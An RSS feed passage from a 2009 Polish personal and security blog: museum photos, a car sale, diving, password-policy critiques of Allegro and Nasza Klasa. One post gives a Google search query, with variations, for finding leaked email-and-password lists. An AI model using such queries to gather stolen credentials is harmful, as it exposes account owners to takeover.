samochód Jamesa Bonda, BMW, na filmie sterowany z tel. komórkowego (BTW, my właśnie sprzedajemy jeden z &lt;a href=&quot;http://blog.konieczny.be/2009/10/26/sprzedam-samochod-jamesa-bonda-citroen-2cv-1973-zolty/&quot;&gt;samochodów Bonda&lt;/a&gt;)&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418098/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418098_2903bc8f31_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050992&quot;&gt;&lt;/a&gt;&lt;br&gt;
uniwersalny, automatyczny wytrych&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418102/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418102_47c306cde4_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050993&quot;&gt;&lt;/a&gt;&lt;br&gt;
CB-Radio w zegarku...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418120/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418120_e6168f819c_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050995&quot;&gt;&lt;/a&gt;&lt;br&gt;
i na koniec, szarość muzeum...&lt;br&gt;
&lt;br&gt;
W jakim muzeum ostatnio byliście? Podobało się Wam?&lt;/p&gt;
</description><pubDate>Wed, 28 Oct 2009 19:10:27 +0100</pubDate><guid>http://blog.konieczny.be/2009/10/28/wystawa-szpiegow-w-warszawie-zdjecia/</guid><category>IT</category><category>wystawa</category><category>szpiegów</category><category>warszawa</category><category>muzeum</category><category>szpieg</category><category>szpiedzy</category><category>james</category><category>bond</category></item><item><title>Sprzedam samochód Jamesa Bonda! (Citroen 2CV, 1973, żółty)</title><link>http://blog.konieczny.be/2009/10/26/sprzedam-samochod-jamesa-bonda-citroen-2cv-1973-zolty/</link><description>&lt;p&gt;Z racji przeprowadzki, chcemy przekazać Kaczuchę w dobre ręce. Szkoda, żeby taka piękność stała w garażu i nikogo nie uśmiechała. Poznajcie ją bliżej:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8406263/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8406263_987723ddad.jpg&quot; width=&quot;500&quot; height=&quot;333&quot; alt=&quot;allegro2&quot;&gt;&lt;/a&gt; Oprócz tak niewątpliwych zalet jak manualna klimatyzacja, nożny-ręczny hamulec, czy dźwignia zmiany biegów przy kierownicy, Kaczucha posiada szereg innych, przydatnych funkcji:&lt;br&gt;
&lt;br&gt;
&lt;b&gt;* Poprawia humor&lt;/b&gt;. Nie tylko jej kierowcy, ale i przechodniom. Dzieci szaleją, dorośli machają, inni kierowcy ustępują pierwszeństwo — można grzać ile wlezie ;-)&lt;br&gt;
&lt;br&gt;
&lt;b&gt;* Zwraca pieniądze za bliety parkingowe&lt;/b&gt;. Każdy dłuższy postój w mieście to albo nowa maskotka, albo kwiatuchy za wycieraczką. Że nie wspomnę o niezliczonej ilości wzruszających liścików wetkniętych za wycieraczkę :) To z nadwyżką rekompensuje stres związany ze staniem w korkach oraz pieniądze wydane na bilet parkingowy ;)&lt;br&gt;
&lt;br&gt;
&lt;b&gt;* Zarabia pieniądze&lt;/b&gt;. I to całkiem niezłe. Wynajęcie jej na ślub (2h) to zysk ok. 700PLN - 1000PLN&lt;br&gt;
&lt;br&gt;
&lt;b&gt;* To jest samochód Jamesa Bonda!&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
&lt;p&gt;&lt;object width=&quot;320&quot; height=&quot;265&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube-nocookie.com/v/CvJp1X3qiog&amp;amp;hl=en&amp;amp;fs=1&amp;amp;color1=0x234900&amp;amp;color2=0x4e9e00#t=1m19s&quot;&gt;
&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;
&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;
&lt;embed src=&quot;http://www.youtube-nocookie.com/v/CvJp1X3qiog&amp;amp;hl=en&amp;amp;fs=1&amp;amp;color1=0x234900&amp;amp;color2=0x4e9e00#t=1m19s&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;320&quot; height=&quot;265&quot;&gt;&lt;/object&gt;&lt;/p&gt;
&lt;p&gt;Wierzcie mi, że ten pościg to tylko ułamek możliwości tego samochodu ;-)&lt;br&gt;
&lt;br&gt;
&lt;b&gt;* Jest jak transformer&lt;/b&gt;. Jednym ruchem zamienisz ją w seksowne cabrio... A zwinięty dach, oprócz rozwiewania grzywki, daje +100 do lansu i +1000 do zdolności podrywania ;-) Sprawę ułatwia fakt, że przednie siedzenia tworzą kanapę, nie ma między nimi żadnego odstępu...&lt;br&gt;
&lt;br&gt;
&lt;b&gt;* Parkuje wszędzie i nie płaci mandatów&lt;/b&gt; — z racji jej rozmiarów wszędzie nią zaparkujesz, także w miejscach niedozwolonych. Nawet Policja nie ma serca ukarać jej mandatem ;)&lt;/p&gt;
&lt;h3&gt;Dane Techniczne&lt;/h3&gt;
&lt;p&gt;- rocznik 1973&lt;br&gt;
- nowa rama samochodu (niespawana, a jednoczęściowa; odlana na specjalne zamówienie w 2006r.)&lt;br&gt;
- odnowiony i zregenerowany w 2004 roku silnik: 0.4 litra (23KM)&lt;br&gt;
- nowe opony (kupione w październiku 2009r.)&lt;br&gt;
- przebieg: 138000 km&lt;br&gt;
- spalanie: 5l na 100 km&lt;br&gt;
- max. predkość: 110 km/h (ale przecież liczy się styl i klasa ;-)&lt;br&gt;
- przegląd techniczny ważny do 17-tego lipca 2010r.&lt;br&gt;
Kaczucha jest sprawna, ale nie idealna — trzeba ją pokochać z wadami, albo poniższe wady usunąć ;-)&lt;br&gt;
&lt;br&gt;
- nie działa wskaźnik paliwa (ale nowego właściciela nauczymy niezbędnej magii, która pozwolina przewidzenie ilości paliwa w baku)&lt;br&gt;
- siedzenia wymagają czyszczenia (zapewne karcher wystarczy, koszt ok. 30PLN, odliczymy od ceny sprzedaży ;)&lt;br&gt;
- w dachu znajdują się niewielkie uszkodzenia (łatane na bieżąco). Wypadałoby dach wymienić lub wpisać w kalendarz regularne sprawdzanie stanu obecnych łat ;)&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8406261/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8406261_688c9a776b.jpg&quot; width=&quot;500&quot; height=&quot;360&quot; alt=&quot;allegro1&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Masz pytania, chcesz kupić?&lt;/h3&gt;
&lt;p&gt;Więcej informacji udzielam poprzez &lt;a href=&quot;http://kontakt.konieczny.be&quot;&gt;e-maila, lub Gadu-Gadu i Jabbera&lt;/a&gt;. Wstępnie wyceniliśmy ją na 15 000 PLN (do negocjacji). Kaczucha stacjonuje w Poznaniu. Więcej zdjęć &lt;a href=&quot;http://konieczny.be/misc/2cv/&quot;&gt;jest tutaj&lt;/a&gt;.&lt;/p&gt;
</description><pubDate>Mon, 26 Oct 2009 23:24:53 +0100</pubDate><guid>http://blog.konieczny.be/2009/10/26/sprzedam-samochod-jamesa-bonda-citroen-2cv-1973-zolty/</guid><category>IT</category><category>ja</category><category>citroen</category><category>2cv</category><category>kaczka</category><category>samochód</category><category>oldmobile</category><category>sprzedam</category><category>kupię</category></item><item><title>Videopost</title><link>http://blog.konieczny.be/2009/10/22/videopost/</link><description>&lt;p&gt;Jak już kilka osób &lt;a href=&quot;http://blip.pl/s/18209018&quot;&gt;zauważyło&lt;/a&gt;, na stronie Plusa można było (do dzisiaj :&amp;gt;) oglądać materiał dot. &quot;bezpiecznych&quot; haseł, który nagrałem na prośbę &lt;a href=&quot;http://lookr.tv/player.php?id=1056&quot;&gt;lookr.tv&lt;/a&gt; jako komentarz do niedawnego &lt;a href=&quot;http://blog.konieczny.be/2009/10/14/jak-znalezc-listy-hasel-do-e-maili/&quot;&gt;wycieku&lt;/a&gt; danych z Hotmaila i GMaila. Nie jest to nic, czym warto się chwalić, ale chciałbym wykorzystać okazję i zapytać Was &lt;b&gt;co myślicie o vidcastach&lt;/b&gt;? Nie ukrywam, że to wygodniejsza i szybsza metoda przekazywania informacji w stosunku do tradycyjnego postowania (minuty vs. godziny) -- pytanie, czy przekaz jest równie jasny...?&lt;/p&gt;
&lt;p&gt;
&lt;p&gt;&lt;object width='500' height='300'&gt;&lt;param name='movie' value='http://lookr.tv/flash/vCastPlayer.swf'&gt;
&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;
&lt;param name='allowScriptAccess' value='always'&gt;
&lt;param name='flashvars' value='episodeId=1056&amp;amp;autoStart=false&amp;amp;pmode=2'&gt;
&lt;embed src='http://lookr.tv/flash/vCastPlayer.swf' type='application/x-shockwave-flash' width='500' height='300' allowfullscreen='true' allowscriptaccess='always' flashvars='episodeId=1056&amp;amp;autoStart=false&amp;amp;pmode=2'&gt;&lt;/object&gt;&lt;/p&gt;
&lt;p&gt;P.S. Trochę przeraża mnie myśl, że nagranie powstało dlatego, że niektórym ludziom ciągle trzeba tłumaczyć jakie powinno być hasło i dlaczego warto posiadać różne hasła do różnych serwisów...&lt;/p&gt;
</description><pubDate>Thu, 22 Oct 2009 20:31:10 +0200</pubDate><guid>http://blog.konieczny.be/2009/10/22/videopost/</guid><category>IT</category><category>ja</category><category>Kraków</category><category>porady</category><category>security</category><category>lookr</category><category>microsoft</category><category>hotmail</category><category>gmail</category><category>hasła</category><category>videopost</category><category>video</category></item><item><title>Jak znaleźć listy haseł do e-maili? </title><link>http://blog.konieczny.be/2009/10/14/jak-znalezc-listy-hasel-do-e-maili/</link><description>&lt;p&gt;Parę dni temu, wszyscy &lt;a href=&quot;http://www.networkworld.com/news/2009/100609-gmail-yahoo-mail-join-hotmail.html&quot;&gt;ekscytowali&lt;/a&gt; się&amp;nbsp;znalezionymi w sieci listami zawierającymi 20 000 adresów e-mail i haseł do GMaila, Hotmaila oraz AOL. Dziś chciałem sobie ściągnąć taką listę do celów statystycznych, ale wygląda na to, że przez przypadek ułożyłem zapytanie, które zwraca więcej (i bardziej interesujących) list tego typu:&lt;/p&gt;
&lt;p&gt;
&lt;blockquote&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;q=gmail.com+hotmail.com+123456+filetype%3Atxt&amp;amp;btnG=Search&quot;&gt;gmail.com hotmail.com 123456 filetype:txt&lt;/a&gt;&lt;/blockquote&gt;
&lt;p&gt;Co w zapytaniu robi &lt;i&gt;123456&lt;/i&gt;? -- założyłem, że jest to dość popularne hasło i powinno ono wystąpić na większości list tego typu... Można popróbować też z &quot;dupą&quot;, &quot;qwerty&quot; i paroma innymi popularnymi hasłami :&amp;gt;&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8328388/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8328388_dc83892800_m.jpg&quot; width=&quot;240&quot; height=&quot;147&quot; alt=&quot;GH2&quot;&gt;&lt;/a&gt; &lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8328387/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8328387_7e779ed16c_m.jpg&quot; width=&quot;240&quot; height=&quot;117&quot; alt=&quot;GH&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Tym, którzy nie czują się zbyt pewnie w temacie specjalnych operatorów wyszukiwania, polecam mój wykład pt. &lt;a href=&quot;http://blog.konieczny.be/2006/01/04/google-hacking-penetration-testing/&quot;&gt;Google Hacking&lt;/a&gt;.&lt;br&gt;
&lt;br&gt;
P.S. Prawdopodobnie większość kont z tych list nie będzie działać -- pamiętajcie o tym, że tysiące phisherów miało je przed wami ;) I tak, wiem, że zapytanie można trochę rozbudować, żeby osiągnąć lepsze wyniki — ale to pozostawiam Wam jako pracę domową... ;-)&lt;/p&gt;
</description><pubDate>Wed, 14 Oct 2009 19:51:03 +0200</pubDate><guid>http://blog.konieczny.be/2009/10/14/jak-znalezc-listy-hasel-do-e-maili/</guid><category>IT</category><category>Techblog</category><category>google</category><category>hacking</category><category>hasła</category><category>e-mail</category><category>listy</category><category>gmail</category><category>hotmail</category><category>wyciek</category></item><item><title>Nurkowanie w Jaworznie -- koparki :)</title><link>http://blog.konieczny.be/2009/10/12/nurkowanie-w-jaworznie-koparki/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8321816/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8321816_187ef5c460_o.png&quot; width=&quot;500&quot; height=&quot;264&quot; alt=&quot;jaworzno&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p style=&quot;text-align:right;&quot;&gt;&lt;small&gt;fot. Gazeta.pl&lt;/small&gt;&lt;/p&gt;
&lt;p&gt;W miniony weekend wybraliśmy się z M. do Jaworzna celem zanurkowania w tamtejszym &lt;a href=&quot;http://www.nurkomania.pl/nurkowisko_jaworzno_koparki.htm&quot;&gt;kamieniołomie&lt;/a&gt;. Pod wodą znaleźć tam można koparki (takie duuuuże). Dla mnie było to pierwsze nurkowanie, tzw. intro, czyli zejście z instruktorem. Najpierw wypożyczenie sprzętu, potem przebranie się w piankę, naplucie do maski, założenie ołowianego pasa, przykręcenie automatu do butli, butla hop na plecy, płetwy i można skakać do wody :)&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8319728/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8319728_38cf49ca93_o.png&quot; width=&quot;498&quot; height=&quot;249&quot; alt=&quot;Zdjęcie_&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Z racji tego, że zbiornik jest sztuczny, przejrzystość wody jest wysoka; 6-7m. Stały dopływ wód gruntowych gwarantuje dobrą temperaturę. Kiedy wczoraj temperatura na zewnątrz wynosiła 13C, w wodzie było 16C... W zbiorniku prawie w ogóle nie ma roślinności, dzięki czemu udało nam się całkiem wyraźnie zobaczyć kilka rybek i koparę ;-) Ponieważ nasz podwodny aparat był padł, zdjęcia powyżej i filmy poniżej ukradliśmy z internetu ;)&lt;/p&gt;
&lt;p&gt;&lt;object width=&quot;480&quot; height=&quot;385&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube-nocookie.com/v/E-4WFGlAuyM&amp;amp;hl=en&amp;amp;fs=1&amp;amp;color1=0x234900&amp;amp;color2=0x4e9e00&quot;&gt;
&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;
&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;
&lt;embed src=&quot;http://www.youtube-nocookie.com/v/E-4WFGlAuyM&amp;amp;hl=en&amp;amp;fs=1&amp;amp;color1=0x234900&amp;amp;color2=0x4e9e00&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;480&quot; height=&quot;385&quot;&gt;&lt;/object&gt;&lt;/p&gt;
&lt;p&gt;Efekt mojego nurkowania jest taki, że zamierzam wybrać się na kurs. Również w Jaworznie (bo zamiast zajęć na basenie, robią je w kamieniołomie ;)&lt;br&gt;
&lt;br&gt;
P.S. Myślałem, że pływanie w płetwach jest łatwiejsze...&lt;/p&gt;
</description><pubDate>Mon, 12 Oct 2009 20:24:57 +0200</pubDate><guid>http://blog.konieczny.be/2009/10/12/nurkowanie-w-jaworznie-koparki/</guid><category>IT</category><category>ja</category><category>nurkowanie</category><category>podróże</category><category>rozrywka</category><category>jaworzno</category><category>kamieniołom</category><category>koparki</category><category>orka</category></item><item><title>Zmiana hasła na Allegro (i inne wymuszenia)</title><link>http://blog.konieczny.be/2009/10/09/zmiana-hasla-na-allegro-i-inne-wymuszenia/</link><description>&lt;p&gt;Allegro wysłało wczoraj do użytkowników e-maile z prośbą o zmianę hasła:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8302974/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8302974_f7e9332a7d.jpg&quot; width=&quot;500&quot; height=&quot;271&quot; alt=&quot;AllegroPasswords&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Nie był to pierwszy tego typu mailing (por. &lt;a href=&quot;http://di.com.pl/news/28001,0,Allegro_kontrowersje_wokol_sposobu_przechowywania_hasel.html&quot;&gt;artkuł w DI&lt;/a&gt;). Wczorajszy e-mail jest więc zapewne kontynuacją akcji rozpoczętej miesiąc temu.&lt;br&gt;
&lt;br&gt;
Mam kilka uwag, co do całego procesu &quot;&lt;b&gt;wymuszania zmiany haseł&lt;/b&gt;&quot;. Część z nich zaprezentowałem już w poście opisującym współpracę &lt;a href=&quot;http://blog.konieczny.be/2009/09/19/nasza-klasa-zresetowala-mi-haslo-bo-wykop-jej-kazal/&quot;&gt;Naszej Klasy z Wykopem&lt;/a&gt;, teraz parę słów komentarza do sprawy Allegro:&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Security Warning dla użytkowników&lt;br&gt;
- jak to zrobić poprawnie? (case na podstawie Allegro)&lt;/h3&gt;
&lt;p&gt;1. &lt;b&gt;Linki w e-mailu&lt;/b&gt;. Osobiście, uważam, że przesyłanie przez serwis w e-mailu do użytkownika &lt;b&gt;*jakichkolwiek*&lt;/b&gt; linków jest złą praktyką. Po pierwsze (i najważniejsze), przyzwyczaja to użytkowników do obecności linków w oficjalnych mailach i zachęca do klikania w nie, co w przypadku phishingu będzie miało opłakane skutki. Doceniam to, że Allegro uczy się na własnych błędach (por. &lt;a href=&quot;http://blog.konieczny.be/2008/01/07/zakaly-informatyki-2-allegro-i-phishing/&quot;&gt;Allegro i phishing&lt;/a&gt;) i tym razem nie podało bezpośredniego linku do formularza zmiany hasła, ale niestety, w mailu umieszczono inne linki, a jak wiemy &quot;większość Polaków nie widzi różnicy&quot;.&lt;br&gt;
&lt;br&gt;
2. &lt;b&gt;Opis tekstowy&lt;/b&gt;. W treści e-maila zabrakło mi tekstu opisującego jak po zalogowaniu do serwisu zmienić hasło. Jego brak sprawia, że użytkownik czuje się zagubiony, co jeszcze bardziej zachęca do klikania w linki z sekcji &quot;Przydatne informacje&quot;, celem poszukania odpowiedniej informacji.&lt;br&gt;
&lt;br&gt;
3. &lt;b&gt;Nowe hasło może być takie jak obecne&lt;/b&gt;. Nie byłbym sobą, gdybym nie spróbował zmienić hasła na takie, jakie miałem do tej pory :&amp;gt; Jak się zapewne domyślacie, udało się!&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8302971/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8302971_11925bf960_o.png&quot; width=&quot;495&quot; height=&quot;229&quot; alt=&quot;Allegro.pl - aukcje internetowe, bezpieczne zakupy&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Na szczęscie, &lt;a href=&quot;http://zen.jogger.pl&quot;&gt;zen&lt;/a&gt; szybko &lt;a href=&quot;http://blip.pl/dm/17441168&quot;&gt;zareagował&lt;/a&gt; na &lt;a href=&quot;http://blip.pl/s/17441104&quot;&gt;bugreport&lt;/a&gt; i wziął się za szukanie winowajcy ;)&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8302989/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8302989_58a1ea33ec.jpg&quot; width=&quot;500&quot; height=&quot;84&quot; alt=&quot;BLIP - Bardzo Lubię Informować Przyjaciół&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
...ale dziś dalej można zmieniać hasło na bieżące...&lt;br&gt;
&lt;br&gt;
To prowadzi nas do błyskotliwej myśli. Skoro nasze konto zostało wytypowane, jako posiadające niby-słabe hasło, to &lt;b&gt;dlaczego zmiana hasła na takie samo, albo nawet słabsze jest możliwa&lt;/b&gt;? Jaki jest cel wymuszenia zmiany hasła, skoro de facto pozwala się użytkownikowi na pozostanie przy swoim starym niby-słabym haśle?&lt;br&gt;
&lt;br&gt;
Jest to przykład błedu w &lt;b&gt;logice biznesowej&lt;/b&gt;, o której ostatnio pisał &lt;a href=&quot;http://blog.codeninja.pl/2009/10/testowanie-logiki-biznesowej.html&quot;&gt;rezos&lt;/a&gt;. Obstawiam, że w myśl złotej zasady: &quot;&lt;i&gt;ludzie nie lubią zmieniać haseł&lt;/i&gt;&quot;, większość użytkowników Allegro stworzy swoje nowe hasło poprzez dopisanie 1, lub 2 do starego, albo jak ja, spróbuje je po prostu zmienić na stare...&lt;/p&gt;
&lt;h3&gt;Dlaczego Allegro zmienia hasła?&lt;/h3&gt;
&lt;p&gt;W internecie panuje &lt;a href=&quot;http://www.alert24.pl/alert24/1,84880,7123755,Allegro_chce_ode_mnie_zmiany_hasla__Dlaczego_.html&quot;&gt;powszechna opinia&lt;/a&gt;, że prośba o zmianę haseł podyktowana jest ich wyciekiem. Ja jednak się z nią nie zgadzam, bo posiadacz bazy haseł, wiedząc o akcji, może się spokojnie zalogować na konta użytkowników i złośliwie pozmieniać im hasła na nowe. Tego typu &lt;b&gt;wymuszenie zmiany hasła kiepsko broni przed atakami związanymi z wyciekiem bazy haseł&lt;/b&gt; (już lepszy jest reset, vide &lt;a href=&quot;http://blog.konieczny.be/2009/09/19/nasza-klasa-zresetowala-mi-haslo-bo-wykop-jej-kazal/&quot;&gt;Nasza-Klasa&lt;/a&gt;). A ponieważ wiem, że ludzie pracujący w dziale bezpieczeństwa Allegro są sensowni, nie wierzę, że nie zdają sobie z tego sprawy ;)&lt;br&gt;
&lt;br&gt;
Poniżej przedstawiam alternatywną hipotezę, i tylko $DEITY oraz CSO Allegro raczą wiedzieć, czy moje domysły są słuszne... ale pewnie ani jeden ani drugi się nie wypowie ;)&lt;/p&gt;
&lt;div style=&quot;padding-left:25px;&quot;&gt;
&lt;p&gt;Allegro powstało dawno temu (AFAIR silnik został napisany w piwnicy przez jednego programistę, w tydzień). Domyślam się, że wtedy nie przywiązywano wiele wagi co do jakości i bezpieczeństwa kodu. &lt;b&gt;Nieszyfrowanie haseł użytkowników&lt;/b&gt; (albo jakiś cienki XOR) &lt;b&gt;to była normalka&lt;/b&gt;, wystarczy wspomnieć tu Gadu-Gadu, czy parę innych internetowych kolosów, które również powstawały w tamtym okresie.&lt;br&gt;
&lt;br&gt;
Tak więc Allegro przez lata sobie działa, trzymając w bazie hasła &lt;b&gt;jawnym&lt;/b&gt; tekstem, albo jakimś prostym algorytmem symetrycznym. Biznes się rozrasta, a na bezpieczeństwie albo się oszczędza, albo nie ma się dlań czasu, bo trzeba zrobić upgrade &lt;i&gt;tego&lt;/i&gt;, na szybko załatać &lt;i&gt;to&lt;/i&gt;, zaimplementować &lt;i&gt;tamto&lt;/i&gt;, wystartować z &lt;i&gt;tym&lt;/i&gt;, które przecież trzeba też zabezpieczyć od zera... itp.&lt;br&gt;
&lt;br&gt;
Ryzyko wycieku danych, które przez lata było stosunkowo małe (przez co, zupełnie słusznie, nie opłacało się poświęcać mu wiele czasu i środków). W dobie botnetów i głośnych w mediach wycieków haseł&amp;nbsp;ze znanych w Polsce serwisów (por. &lt;a href=&quot;http://blog.konieczny.be/2009/09/05/hasla-uzytkownikow-wykop-pl-wyciekly/&quot;&gt;sprawa Wykopu&lt;/a&gt;), ryzyko jednak odrobinę się powiększa, a jeszcze kontrole GIODO i inne audyty przechodzić trzeba od czasu do czasu... Po udanej migracji na nową infrastrukturę pada więc pomysł zmiany sposobu przechowywania haseł.&lt;br&gt;
&lt;br&gt;
Jeśli hasła są w plaintekście, można to zrobić &lt;b&gt;po cichu, masowo i z automatu&lt;/b&gt; (i mam nadzieję, że jakiś czas temu Allegro w ten sposób przeszło na hashowanie :P), ale wiele biznesów nie może oprzeć się pokusie &lt;b&gt;przypomnienia swojej marki użytkownikowi pod byle pretekstem&lt;/b&gt;. Jak to mówią, każdy powód do mailingu jest dobry ...a taki który pokazuje, że podnosimy bezpieczeństwo danych użytkownika, to nawet &lt;b&gt;powód bardzo dobry&lt;/b&gt;. Popatrzcie tylko na Wykop, takiego faila zaliczył, a jednak wszystkie media o nim napisały (&lt;i&gt;ciekawe ile nowych użytkowników sciągnęły wstawki w telewizji i radio, w myśl zasady, że nie ważne co piszą, byle nie przekręcili nazwy serwisu...&lt;/i&gt; ;-)&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;Nawet jeśli powyższe gdybania nie opisują w 100% historii Allegro, myślę, że znajdzie się kilka innych serwisów w Polsce, które idealnie pasują do powyżej sytuacji... Jeśli zauważasz podobieństwa ze swoim startupem, pora wziąć się do roboty.&lt;br&gt;
&lt;br&gt;
I na koniec, taka tam nieistotna, ale dająca do myślenia informacja ;)&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8302972/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8302972_dc4686d036_o.png&quot; width=&quot;500&quot; height=&quot;142&quot; alt=&quot;AllegroHasla&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Równie dający do myślenia jest komentarz Peceta, dotyczący 16-znakowego ograniczenia na nowe hasło a pochodzący z wpisu &lt;a href=&quot;http://paolo.org.pl/sid/316afa807813bf6ec4737e49467ee100/2009/10/09/miniblog-allegro-zmieni-ci-haslo-bo/&quot;&gt;Paolo&lt;/a&gt;.&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8304927/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8304927_4077f4271c.jpg&quot; width=&quot;500&quot; height=&quot;106&quot; alt=&quot;Paolo.org.pl&quot;&gt;&lt;/a&gt; &lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8304935/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8304935_545bf7ddcf.jpg&quot; width=&quot;500&quot; height=&quot;100&quot; alt=&quot;Paolo » Jogger - Miniblog_ Allegro zmieni Ci hasło, bo...-1&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
P.S. A może znacie lepszy powód, dla którego Allegro wymusza zmianę haseł? Jest co najmniej jeden, o którym świadomie nie napisałem... ;)&lt;/p&gt;
</description><pubDate>Fri, 09 Oct 2009 20:59:14 +0200</pubDate><guid>http://blog.konieczny.be/2009/10/09/zmiana-hasla-na-allegro-i-inne-wymuszenia/</guid><category>bugs</category><category>IT</category><category>porady</category><category>przekręty</category><category>security</category><category>Techblog</category><category>Allegro</category><category>hasła</category><category>zmiana</category><category>Wykop</category><category>Nasza-Klasa</category><category>wyciek</category><category>baza</category></item><item><title>Mac &amp; Bones (koszulka)</title><link>http://blog.konieczny.be/2009/10/01/mac-bones-koszulka/</link><description>&lt;p&gt;Kontynuując cykl &quot;&lt;a href=&quot;http://blog.konieczny.be/kategoria/t-shirt/&quot;&gt;czwartek z geekowym t-shirtem&lt;/a&gt;&quot;, dziś przedstawiam wam koszulkę &lt;i&gt;Mac &amp;amp; Bones&lt;/i&gt;. Kupiona gdzieś w amerykańskim internecie za 15 USD.&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8263528/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8263528_b8d3278004.jpg&quot; width=&quot;476&quot; height=&quot;500&quot; alt=&quot;t-shirt_mac&quot;&gt;&lt;/a&gt;&lt;/p&gt;
</description><pubDate>Thu, 01 Oct 2009 20:12:08 +0200</pubDate><guid>http://blog.konieczny.be/2009/10/01/mac-bones-koszulka/</guid><category>funny</category><category>IT</category><category>ja</category><category>mac</category><category>t-shirt</category><category>koszulka</category><category>geek</category><category>tshirt</category><category>bones</category><category>apple</category></item><item><title>Nasza Klasa zresetowała mi hasło ...bo Wykop jej kazał!</title><link>http://blog.konieczny.be/2009/09/19/nasza-klasa-zresetowala-mi-haslo-bo-wykop-jej-kazal/</link><description>&lt;p&gt;Wykop.pl chyba nie nauczył się niczego na swojej &lt;a href=&quot;http://blog.konieczny.be/2009/09/05/hasla-uzytkownikow-wykop-pl-wyciekly/&quot;&gt;niedawnej wpadce&lt;/a&gt;. Wczoraj dostałem takiego e-maila:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8186718/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8186718_f460eac60d_o.png&quot; width=&quot;501&quot; height=&quot;467&quot; alt=&quot;NaszaKlasa-1&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
